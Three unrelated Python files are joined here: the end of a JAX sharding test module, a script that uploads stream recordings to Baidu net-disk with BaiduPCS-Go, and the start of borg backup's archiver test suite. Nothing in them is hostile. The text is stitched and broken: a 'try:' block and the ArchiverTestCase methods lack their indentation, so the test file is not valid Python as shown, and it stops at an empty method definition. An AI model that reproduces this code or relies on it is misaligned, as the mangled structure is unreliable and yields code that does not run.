        return h(x)
    xshape = (2, 5, 6)
    x = jnp.arange(np.prod(xshape)).reshape(xshape)
    with self.assertRaisesRegex(RuntimeError,
                                "Changing the physical mesh is not allowed.*"):
      f(x)
class UtilTest(jtu.JaxTestCase):
  """Tests for sharding utility helpers (OpSharding round-trips etc.)."""

  def testOpShardingRoundTrip(self):
    """PartitionSpec -> OpSharding proto -> PartitionSpec is lossless."""
    FakeDevice = namedtuple('FakeDevice', ['id'])
    mesh_named_shape = OrderedDict([('a', 2), ('b', 3), ('c', 4), ('d', 7), ('e', 4)])
    mesh_axes, mesh_shape = unzip2(mesh_named_shape.items())
    devices = [FakeDevice(i) for i in range(np.prod(list(mesh_shape)))]
    mesh = pxla.Mesh(np.array(devices).reshape(*mesh_shape), tuple(mesh_axes))
    dims = 5
    aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)

    def roundtrip(spec):
      op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
      parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
      # The parsed spec may be padded with empty entries at the tail.
      self.assertEqual(parsed_spec[:len(spec)], spec)
      self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))

    special_specs = [P()]
    for spec in special_specs:
      roundtrip(spec)
    # Fuzz: 100 random assignments of mesh axes to positional dimensions.
    rng = self.rng()
    for i in range(100):
      spec = [()] * dims
      for axis in rng.permutation(mesh_axes)[:rng.randint(low=1, high=len(mesh_axes) + 1)]:
        spec[rng.choice(dims)] += (axis,)
      roundtrip(P(*spec))

  @parameterized.named_parameters(
      ("linear", {'x': 0, 'y': 1, 'z': 2}, (('x',), ('y',), ('z',))),
      ("combine", {'x': 0, 'y': 0, 'z': 1}, (('x', 'y'), ('z',))),
      ("skip", {'x': 0, 'y': 0, 'z': 2}, (('x', 'y'), None, ('z',))),
      ("multi_skip", {'x': 0, 'y': 1, 'z': 3}, (('x',), ('y',), None, ('z',))),
  )
  def test_array_mapping_to_axis_resources(self, inp, expected_out):
    self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)

  def test_get_input_metadata_fully_replicated(self):
    """Replicated inputs get full-slice indices on every local device."""
    global_mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
    global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
    global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
    global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
    in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]
    _, out_indices, _ = pxla._get_input_metadata(
        in_avals, global_mesh, [{}, {}, {}], [False, False, False])
    self.assertLen(out_indices, len(in_avals))
    # One index tuple per local device, with one slice(None) per dimension.
    self.assertTrue(all(len(out) == len(global_mesh.local_devices)
                        for out in out_indices))
    self.assertTrue(all(len(i) == aval.ndim
                        for out, aval in safe_zip(out_indices, in_avals) for i in out))
    self.assertTrue(all(i == (slice(None),) * aval.ndim
                        for out, aval in safe_zip(out_indices, in_avals) for i in out))
if __name__ == '__main__':
  # Run under JAX's test loader so test sharding and flags work as in CI.
  absltest.main(testLoader=jtu.JaxTestLoader())
|
backup2baidu.py | import subprocess
import os
import datetime
from utils.live import Live
from apscheduler.schedulers.blocking import BlockingScheduler
import keyboard
import threading
from utils.log import Log
import time
# Module-level singletons shared by the backup job below.
# NOTE(review): Log() appears to return a factory whose call yields the
# actual logger instance — confirm against utils.log.Log.
logger = Log()()
live = Live()
# Emergency kill switch: Ctrl+/ terminates the whole process immediately.
keyboard.add_hotkey(r'ctrl+/', os._exit, args=[0])
def daily_job():
    """Upload yesterday's recordings to Baidu net-disk via BaiduPCS-Go.

    For every streamer known to ``live``, create the remote directory
    ``/录播/<name>`` and upload each local file under ``rec/<name>`` whose
    name ends with yesterday's date stamp (``YYYYMMDD``).  Files whose
    name contains ``_mask`` are skipped.
    """
    pcs_exe = r'.\utils\BaiduPCS-Go.exe'
    local_base_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'rec')
    pcs_base_path = '/录播/%s'
    # Hoisted out of the loops: the stamp is identical for every file.
    yesterday = (datetime.date.today() - datetime.timedelta(days=1)).strftime('%Y%m%d')
    # Copy so concurrent mutation of live.live_infos can't break iteration.
    live_infos = live.live_infos.copy()
    for key in live_infos:
        name = live_infos[key]['uname']
        base_path = os.path.join(local_base_path, name)
        if not os.path.exists(base_path):
            continue  # nothing recorded for this streamer yet
        result = subprocess.run([pcs_exe, "mkdir", pcs_base_path % name])
        print(result)
        print(base_path)
        for f in os.listdir(base_path):
            full_path = os.path.join(base_path, f)
            if not os.path.isfile(full_path):
                continue
            if '_mask' in f:
                continue  # masked variants are not uploaded
            # File names look like '<title>_<YYYYMMDD>.<ext>': strip the
            # extension, take the last '_'-separated token as the stamp.
            date_stamp = '.'.join(f.split('.')[:-1]).split('_')[-1]
            print(date_stamp)
            print(yesterday)
            if date_stamp == yesterday:
                result = subprocess.run([pcs_exe, 'upload', full_path, pcs_base_path % name])
                print(result)
# Disabled: earlier scheduler-based trigger, kept for reference.
# def test():
#     logger.info(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
# def scheduler_run():
#     scheduler = BlockingScheduler()
#     scheduler.add_job(test,'cron',day_of_week='0-6',hour=17,minute=10)
#     scheduler.start()
# threading.Thread(target=scheduler_run,daemon=True).start()
# while True:
#     time.sleep(1)
# a = a = subprocess.run([PCSpath,"share","set",'录播'])
# Run one backup pass immediately when the script is executed.
daily_job()
archiver.py | import argparse
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
try:
import llfuse
except ImportError:
pass
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota
from ..cache import Cache, LocalCache
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, has_llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
# Root of the borg source package under test (parent of this tests dir);
# used as a stable, non-trivial directory to archive in tests.
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
    """Run a borg command and return ``(exit_code, output)``.

    With ``fork=True`` the command runs as a subprocess: *exe* selects the
    binary (``None`` -> current interpreter running ``borg.archiver``,
    ``str`` -> that executable, ``tuple`` -> used verbatim as the command
    prefix).  Otherwise the command runs in-process through an ``Archiver``
    instance with stdin/stdout/stderr temporarily redirected.

    ``output`` is ``bytes`` when ``binary_output`` is true, else ``str``.
    """
    if fork:
        try:
            if exe is None:
                borg = (sys.executable, '-m', 'borg.archiver')
            elif isinstance(exe, str):
                borg = (exe, )
            elif isinstance(exe, tuple):
                # Bug fix: a tuple exe previously fell through without ever
                # assigning `borg`, so the module `borg` (imported at file
                # top) leaked in and the subprocess call crashed.
                borg = exe
            else:
                raise ValueError('exe must be None, a tuple or a str')
            output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
            ret = 0
        except subprocess.CalledProcessError as e:
            output = e.output
            ret = e.returncode
        except SystemExit as e:  # possibly raised by argparse
            output = b''  # bytes, so the binary_output branch stays consistent
            ret = e.code
        if binary_output:
            return ret, output
        else:
            return ret, os.fsdecode(output)
    else:
        stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
        try:
            sys.stdin = StringIO(input.decode())
            sys.stdin.buffer = BytesIO(input)
            output = BytesIO()
            # Always use utf-8 here, to simply .decode() below
            output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
            if archiver is None:
                archiver = Archiver()
            archiver.prerun_checks = lambda *args: None
            archiver.exit_code = EXIT_SUCCESS
            helpers.exit_code = EXIT_SUCCESS
            try:
                args = archiver.parse_args(list(args))
                # argparse parsing may raise SystemExit when the command line is bad or
                # actions that abort early (eg. --help) where given. Catch this and return
                # the error code as-if we invoked a Borg binary.
            except SystemExit as e:
                output_text.flush()
                return e.code, output.getvalue() if binary_output else output.getvalue().decode()
            ret = archiver.run(args)
            output_text.flush()
            return ret, output.getvalue() if binary_output else output.getvalue().decode()
        finally:
            sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
    """Return True iff a GNU tar binary is available on PATH."""
    if shutil.which('tar') is None:
        return False
    result = subprocess.run(['tar', '--version'], stdout=subprocess.PIPE)
    return b'GNU tar' in result.stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
# BORG_EXES parametrizes the `cmd` fixture: tests run in-process ('python')
# and, when available, against the standalone binary ('binary').
try:
    exec_cmd('help', exe='borg.exe', fork=True)
    BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
    BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
    """Yield a runner that forks borg either via the interpreter or binary."""
    exe_for_param = {'python': None, 'binary': 'borg.exe'}
    if request.param not in exe_for_param:
        raise ValueError("param must be 'python' or 'binary'")
    exe = exe_for_param[request.param]

    def exec_fn(*args, **kw):
        return exec_cmd(*args, exe=exe, fork=True, **kw)

    return exec_fn
def test_return_codes(cmd, tmpdir):
    """End-to-end check of borg's exit codes for init/create/extract."""
    repo = tmpdir.mkdir('repo')
    input = tmpdir.mkdir('input')
    output = tmpdir.mkdir('output')
    input.join('test_file').write('content')
    rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
    assert rc == EXIT_SUCCESS
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_SUCCESS
    with changedir(str(output)):
        rc, out = cmd('extract', '%s::archive' % repo)
        assert rc == EXIT_SUCCESS
    rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
    assert rc == EXIT_WARNING  # pattern did not match
    rc, out = cmd('create', '%s::archive' % repo, str(input))
    assert rc == EXIT_ERROR  # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
    """Fill a tiny filesystem during `borg create` and verify borg recovers.

    Repeatedly creates archives until the 16MB filesystem at DF_MOUNT runs
    out of space, then frees a reserve area and checks that `borg list` and
    `borg check --repair` still succeed.
    """
    def make_files(dir, count, size, rnd=True):
        # (Re)create `dir` with `count` files of `size` random bytes each;
        # with rnd=True the count/size are randomized to vary the failures.
        shutil.rmtree(dir, ignore_errors=True)
        os.mkdir(dir)
        if rnd:
            count = random.randint(1, count)
            if size > 1:
                size = random.randint(1, size)
        for i in range(count):
            fn = os.path.join(dir, "file%03d" % i)
            with open(fn, 'wb') as f:
                data = os.urandom(size)
                f.write(data)

    with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
        mount = DF_MOUNT
        assert os.path.exists(mount)
        repo = os.path.join(mount, 'repo')
        input = os.path.join(mount, 'input')
        reserve = os.path.join(mount, 'reserve')
        for j in range(100):
            shutil.rmtree(repo, ignore_errors=True)
            shutil.rmtree(input, ignore_errors=True)
            # keep some space and some inodes in reserve that we can free up later:
            make_files(reserve, 80, 100000, rnd=False)
            rc, out = cmd('init', repo)
            if rc != EXIT_SUCCESS:
                print('init', rc, out)
            assert rc == EXIT_SUCCESS
            try:
                success, i = True, 0
                while success:
                    i += 1
                    try:
                        make_files(input, 20, 200000)
                    except OSError as err:
                        if err.errno == errno.ENOSPC:
                            # already out of space
                            break
                        raise
                    try:
                        rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
                        success = rc == EXIT_SUCCESS
                        if not success:
                            print('create', rc, out)
                    finally:
                        # make sure repo is not locked
                        shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
                        os.remove(os.path.join(repo, 'lock.roster'))
            finally:
                # now some error happened, likely we are out of disk space.
                # free some space so we can expect borg to be able to work normally:
                shutil.rmtree(reserve, ignore_errors=True)
                rc, out = cmd('list', repo)
                if rc != EXIT_SUCCESS:
                    print('list', rc, out)
                rc, out = cmd('check', '--repair', repo)
                if rc != EXIT_SUCCESS:
                    print('check', rc, out)
                assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
    """Common fixture for archiver tests.

    Creates an isolated temp directory with repository/input/output/keys/cache
    subdirs, points borg's environment variables at it, and offers helpers to
    run commands and create test files.  Subclasses toggle EXE/FORK_DEFAULT/
    prefix to run against the binary, a forked interpreter, or a remote repo.
    """
    EXE = None  # python source based
    FORK_DEFAULT = False
    prefix = ''

    def setUp(self):
        # Bypass borg's interactive safety prompts in tests.
        os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_RECREATE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
        os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
        # In-process Archiver only when not forking (old-style conditional).
        self.archiver = not self.FORK_DEFAULT and Archiver() or None
        self.tmpdir = tempfile.mkdtemp()
        self.repository_path = os.path.join(self.tmpdir, 'repository')
        self.repository_location = self.prefix + self.repository_path
        self.input_path = os.path.join(self.tmpdir, 'input')
        self.output_path = os.path.join(self.tmpdir, 'output')
        self.keys_path = os.path.join(self.tmpdir, 'keys')
        self.cache_path = os.path.join(self.tmpdir, 'cache')
        self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
        self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
        os.environ['BORG_KEYS_DIR'] = self.keys_path
        os.environ['BORG_CACHE_DIR'] = self.cache_path
        os.mkdir(self.input_path)
        os.chmod(self.input_path, 0o777)  # avoid troubles with fakeroot / FUSE
        os.mkdir(self.output_path)
        os.mkdir(self.keys_path)
        os.mkdir(self.cache_path)
        with open(self.exclude_file_path, 'wb') as fd:
            fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
        with open(self.patterns_file_path, 'wb') as fd:
            fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
        self._old_wd = os.getcwd()
        os.chdir(self.tmpdir)

    def tearDown(self):
        os.chdir(self._old_wd)
        # note: ignore_errors=True as workaround for issue #862
        shutil.rmtree(self.tmpdir, ignore_errors=True)
        # Reset logging that individual tests may have reconfigured.
        setup_logging()

    def cmd(self, *args, **kw):
        """Run a borg command, assert its exit code, return its output."""
        exit_code = kw.pop('exit_code', 0)
        fork = kw.pop('fork', None)
        if fork is None:
            fork = self.FORK_DEFAULT
        ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
        if ret != exit_code:
            print(output)
        self.assert_equal(ret, exit_code)
        return output

    def create_src_archive(self, name):
        # Archive the borg source tree itself — a convenient large fixture.
        self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)

    def open_archive(self, name):
        """Return (archive, repository) for the named archive, repo still open."""
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            archive = Archive(repository, key, manifest, name)
        return archive, repository

    def open_repository(self):
        return Repository(self.repository_path, exclusive=True)

    def create_regular_file(self, name, size=0, contents=None):
        """Create input/<name> filled with `contents` or `size` 'X' bytes."""
        assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
        filename = os.path.join(self.input_path, name)
        if not os.path.exists(os.path.dirname(filename)):
            os.makedirs(os.path.dirname(filename))
        with open(filename, 'wb') as fd:
            if contents is None:
                contents = b'X' * size
            fd.write(contents)

    def create_test_files(self):
        """Create a minimal test case including all supported file types
        """
        # File
        self.create_regular_file('file1', size=1024 * 80)
        self.create_regular_file('flagfile', size=1024)
        # Directory
        self.create_regular_file('dir2/file2', size=1024 * 80)
        # File mode
        os.chmod('input/file1', 0o4755)
        # Hard link
        if are_hardlinks_supported():
            os.link(os.path.join(self.input_path, 'file1'),
                    os.path.join(self.input_path, 'hardlink'))
        # Symlink
        if are_symlinks_supported():
            os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
        self.create_regular_file('fusexattr', size=1)
        if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
            fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
            # ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
            # will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
            # This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
            # into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
            # (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
            xattr.setxattr(fn, b'user.foo', b'bar')
            xattr.setxattr(fn, b'user.empty', b'')
            # XXX this always fails for me
            # ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
            # same for newer ubuntu and centos.
            # if this is supported just on specific platform, platform should be checked first,
            # so that the test setup for all tests using it does not fail here always for others.
            # xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
        # FIFO node
        if are_fifos_supported():
            os.mkfifo(os.path.join(self.input_path, 'fifo1'))
        if has_lchflags:
            platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
        try:
            # Block device
            os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
            # Char device
            os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
            # File mode
            os.chmod('input/dir2', 0o555)  # if we take away write perms, we need root to remove contents
            # File owner
            os.chown('input/file1', 100, 200)  # raises OSError invalid argument on cygwin
            have_root = True  # we have (fake)root
        except PermissionError:
            have_root = False
        except OSError as e:
            # Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
            if e.errno not in (errno.EINVAL, errno.ENOSYS):
                raise
            have_root = False
        time.sleep(1)  # "empty" must have newer timestamp than other files
        self.create_regular_file('empty', size=0)
        return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
def test_basic_functionality(self):
    """End-to-end smoke test: init, create (x2), extract, list, info, cache rebuild."""
    have_root = self.create_test_files()
    # fork required to test show-rc output
    output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
    self.assert_in('borgbackup version', output)
    self.assert_in('terminating with success status, rc 0', output)
    self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
    output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
    self.assert_in('Archive name: test.2', output)
    self.assert_in('This archive: ', output)
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    list_output = self.cmd('list', '--short', self.repository_location)
    self.assert_in('test', list_output)
    self.assert_in('test.2', list_output)
    # items expected in the archive listing; optional ones appended below
    expected = [
        'input',
        'input/bdev',
        'input/cdev',
        'input/dir2',
        'input/dir2/file2',
        'input/empty',
        'input/file1',
        'input/flagfile',
    ]
    if are_fifos_supported():
        expected.append('input/fifo1')
    if are_symlinks_supported():
        expected.append('input/link1')
    if are_hardlinks_supported():
        expected.append('input/hardlink')
    if not have_root:
        # we could not create these device files without (fake)root
        expected.remove('input/bdev')
        expected.remove('input/cdev')
    if has_lchflags:
        # remove the file we did not backup, so input and output become equal
        expected.remove('input/flagfile')  # this file is UF_NODUMP
        os.remove(os.path.join('input', 'flagfile'))
    list_output = self.cmd('list', '--short', self.repository_location + '::test')
    for name in expected:
        self.assert_in(name, list_output)
    self.assert_dirs_equal('input', 'output/input')
    info_output = self.cmd('info', self.repository_location + '::test')
    item_count = 4 if has_lchflags else 5  # one file is UF_NODUMP
    self.assert_in('Number of files: %d' % item_count, info_output)
    # wipe the cache and make sure "info" still yields the same interesting data
    shutil.rmtree(self.cache_path)
    info_output2 = self.cmd('info', self.repository_location + '::test')
    def filter(output):
        # filter for interesting "info" output, ignore cache rebuilding related stuff
        prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
                    'All archives:', 'Chunk index:', ]
        result = []
        for line in output.splitlines():
            for prefix in prefixes:
                if line.startswith(prefix):
                    result.append(line)
        return '\n'.join(result)
    # the interesting parts of info_output2 and info_output should be same
    self.assert_equal(filter(info_output), filter(info_output2))
def test_init_parent_dirs(self):
    """init refuses missing parent dirs unless --make-parent-dirs is given."""
    parents = os.path.join(self.tmpdir, 'parent1', 'parent2')
    repo_path = os.path.join(parents, 'repository')
    repo_location = self.prefix + repo_path
    # normal borg init does NOT create missing parent dirs
    with pytest.raises(Repository.ParentPathDoesNotExist):
        self.cmd('init', '--encryption=none', repo_location)
    # but with the flag, the whole chain of parents is created
    self.cmd('init', '--encryption=none', '--make-parent-dirs', repo_location)
    assert os.path.exists(parents)
def test_unix_socket(self):
    """A unix socket in the input dir is silently skipped by create/extract."""
    self.cmd('init', '--encryption=repokey', self.repository_location)
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.bind(os.path.join(self.input_path, 'unix-socket'))
    except PermissionError as err:
        # environments differ in how they forbid unix sockets; skip in either case
        if err.errno == errno.EPERM:
            pytest.skip('unix sockets disabled or not supported')
        elif err.errno == errno.EACCES:
            pytest.skip('permission denied to create unix sockets')
    self.cmd('create', self.repository_location + '::test', 'input')
    sock.close()
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
        # the socket must not be part of the extracted tree
        assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
    """A symlink survives a create/extract round trip with its target intact."""
    self.create_test_files()
    archive = self.repository_location + '::test'
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', archive, 'input')
    with changedir('output'):
        self.cmd('extract', archive)
        # link1 was created pointing at 'somewhere' by create_test_files()
        assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
    """mtime always round-trips; atime does too when O_NOATIME is effective."""
    def has_noatime(some_file):
        # probe whether opening with flags_noatime really leaves atime untouched here
        atime_before = os.stat(some_file).st_atime_ns
        try:
            with open(os.open(some_file, flags_noatime)) as file:
                file.read()
        except PermissionError:
            return False
        else:
            atime_after = os.stat(some_file).st_atime_ns
            noatime_used = flags_noatime != flags_normal
            return noatime_used and atime_before == atime_after
    self.create_test_files()
    atime, mtime = 123456780, 234567890
    have_noatime = has_noatime('input/file1')
    os.utime('input/file1', (atime, mtime))
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    with changedir('output'):
        self.cmd('extract', self.repository_location + '::test')
    sti = os.stat('input/file1')
    sto = os.stat('output/input/file1')
    assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
    if have_noatime:
        assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
    else:
        # it touched the input file's atime while backing it up
        # NOTE(review): the archived/extracted atime is still the originally set value — confirm
        assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
    """Both birthtime and mtime survive a create/extract round trip."""
    self.create_test_files()
    birthtime, mtime, atime = 946598400, 946684800, 946771200
    # first utime plants the earlier timestamp (recorded as birthtime),
    # second utime moves mtime forward while birthtime stays put
    os.utime('input/file1', (atime, birthtime))
    os.utime('input/file1', (atime, mtime))
    archive = self.repository_location + '::test'
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', archive, 'input')
    with changedir('output'):
        self.cmd('extract', archive)
    stat_in = os.stat('input/file1')
    stat_out = os.stat('output/input/file1')
    assert int(stat_in.st_birthtime * 1e9) == int(stat_out.st_birthtime * 1e9) == birthtime * 1e9
    assert stat_in.st_mtime_ns == stat_out.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
    """With --nobirthtime, the extracted file gets mtime as its birthtime."""
    self.create_test_files()
    birthtime, mtime, atime = 946598400, 946684800, 946771200
    # same two-step utime dance as in test_birthtime to plant a distinct birthtime
    os.utime('input/file1', (atime, birthtime))
    os.utime('input/file1', (atime, mtime))
    archive = self.repository_location + '::test'
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', '--nobirthtime', archive, 'input')
    with changedir('output'):
        self.cmd('extract', archive)
    stat_in = os.stat('input/file1')
    stat_out = os.stat('output/input/file1')
    # input keeps its real birthtime; output falls back to mtime
    assert int(stat_in.st_birthtime * 1e9) == birthtime * 1e9
    assert int(stat_out.st_birthtime * 1e9) == mtime * 1e9
    assert stat_in.st_mtime_ns == stat_out.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
    """Return the binary repository id of the repository at *path*."""
    # fix: honor the *path* argument (it used to be ignored in favor of
    # self.repository_path; all callers in this file pass that anyway)
    with Repository(path) as repository:
        return repository.id
def _set_repository_id(self, path, id):
    """Overwrite the repository id in the config of the repo at *path*.

    Returns the id read back from the re-opened repository.
    """
    config = ConfigParser(interpolation=None)
    config.read(os.path.join(path, 'config'))
    config.set('repository', 'id', bin_to_hex(id))
    with open(os.path.join(path, 'config'), 'w') as fd:
        config.write(fd)
    # fix: re-open the repository at *path* (the argument used to be ignored
    # here in favor of self.repository_path; all callers pass that anyway)
    with Repository(path) as repository:
        return repository.id
def test_sparse_file(self):
    """Sparse files round-trip via create + extract --sparse, if the FS supports holes."""
    def is_sparse(fn, total_size, hole_size):
        # heuristic sparseness check: exact size, fewer blocks than bytes,
        # and (where SEEK_HOLE/SEEK_DATA work) a hole right at the start
        st = os.stat(fn)
        assert st.st_size == total_size
        sparse = True
        if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
            sparse = False
        if sparse and hasattr(os, 'SEEK_HOLE') and hasattr(os, 'SEEK_DATA'):
            with open(fn, 'rb') as fd:
                # only check if the first hole is as expected, because the 2nd hole check
                # is problematic on xfs due to its "dynamic speculative EOF preallocation
                try:
                    if fd.seek(0, os.SEEK_HOLE) != 0:
                        sparse = False
                    if fd.seek(0, os.SEEK_DATA) != hole_size:
                        sparse = False
                except OSError:
                    # OS/FS does not really support SEEK_HOLE/SEEK_DATA
                    sparse = False
        return sparse
    filename = os.path.join(self.input_path, 'sparse')
    content = b'foobar'
    hole_size = 5 * (1 << CHUNK_MAX_EXP)  # 5 full chunker buffers
    total_size = hole_size + len(content) + hole_size
    with open(filename, 'wb') as fd:
        # create a file that has a hole at the beginning and end (if the
        # OS and filesystem supports sparse files)
        fd.seek(hole_size, 1)
        fd.write(content)
        fd.seek(hole_size, 1)
        pos = fd.tell()
        fd.truncate(pos)
    # we first check if we could create a sparse input file:
    sparse_support = is_sparse(filename, total_size, hole_size)
    if sparse_support:
        # we could create a sparse input file, so creating a backup of it and
        # extracting it again (as sparse) should also work:
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.cmd('create', self.repository_location + '::test', 'input')
        with changedir(self.output_path):
            self.cmd('extract', '--sparse', self.repository_location + '::test')
        self.assert_dirs_equal('input', 'output/input')
        filename = os.path.join(self.output_path, 'input', 'sparse')
        with open(filename, 'rb') as fd:
            # check if file contents are as expected
            self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
            self.assert_equal(fd.read(len(content)), content)
            self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
        self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
    """Files with blanks and parens in their names can be archived and extracted."""
    names = ['normal', 'with some blanks', '(with_parens)', ]
    for name in names:
        # empty placeholder file is enough; only the name matters here
        open(os.path.join(self.input_path, name), 'wb').close()
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    for name in names:
        with changedir('output'):
            self.cmd('extract', self.repository_location + '::test', os.path.join('input', name))
        assert os.path.exists(os.path.join('output', 'input', name))
def test_repository_swap_detection(self):
